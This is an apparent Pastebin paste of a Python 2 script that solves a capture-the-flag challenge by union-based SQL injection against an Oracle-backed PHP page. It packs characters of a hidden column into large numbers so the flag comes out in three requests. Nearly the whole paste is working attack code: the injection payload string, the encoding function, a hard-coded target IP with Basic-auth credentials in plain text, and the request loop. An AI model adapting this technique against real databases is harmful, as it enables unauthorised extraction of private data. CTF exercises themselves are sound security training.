SHARE
TWEET

Untitled

a guest Jan 27th, 2014 359 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #
  3. # Though exploited function has to return ONLY numeric value
  4. # we still can to reduce number of SQL requests to extract flag value
  5. # due to Orcale's ability to operate with quite BIG numbers.
  6. #
  7. # Down here how to obtain flag with just THREE requests:
  8. # ONE for flag's length extracting and TWO for extracting flag itself
  9. #
  10.  
  11. from urllib2 import urlopen, Request
  12. import re
  13. import base64
  14.  
  15. MAX_LEN = 16
  16. username = 'admin'
  17. password = 'P@ssw0rd9823_#@!hhqqyi'
  18.  
  19. def numerize(name, length):
  20.  
  21.         res=[]
  22.         r=''
  23.  
  24.         parts = length // MAX_LEN
  25.         p = MAX_LEN if parts else length
  26.  
  27.         for i in range(length):
  28.                 r += 'ascii(substr(' + name + ',' + str(i + 1) + ',1))*power(256,' + str(p - i % MAX_LEN - 1) + ')%2b'
  29.                 if i % MAX_LEN == MAX_LEN - 1:
  30.                         res.append(r[:-3])
  31.                         parts -= 1
  32.                         r=''
  33.                         p = MAX_LEN if parts else length - i - 1
  34.         if r: res.append(r[:-3])
  35.         return res
  36.  
  37.  
  38. url = 'http://195.133.87.173/address_shops.php?city='
  39. v = "flag''+union+select+to_char(PHD_IV_OWNER2.shop_private_pkg.get_product_quantity(''''''union+select+$PAYLOAD$+from+secret_products+where+hidden_code+is+not+null--''))+from+dual--"
  40. creds = base64.b64encode('%s:%s' % (username, password))
  41. pat = re.compile('<tr>(\d+)</tr>')
  42. column_name = 'hidden_code'
  43.  
  44. payload = 'length(%s)' % column_name
  45.  
  46. print 'Extracting flag length: ',
  47. request = Request(url + v.replace('$PAYLOAD$',payload))
  48. request.add_header("Authorization", "Basic %s" % creds)
  49. resp = urlopen(request).read()
  50.  
  51. l = int(re.search(pat, resp).groups()[0])
  52. print l
  53.  
  54. payloads = numerize(column_name, l)
  55.  
  56. print 'Extracting flag: ',
  57. flag = ''
  58. for payload in payloads:
  59.         request = Request(url + v.replace('$PAYLOAD$',payload))
  60.         request.add_header("Authorization", "Basic %s" % creds)
  61.         resp = urlopen(request).read()
  62.         f = str(hex(int(re.search(pat, resp).groups()[0])))[2:]
  63.         if f.endswith('L'): f = f[:-1]
  64.         flag +=  f.decode('hex')
  65. print flag
RAW Paste Data
Top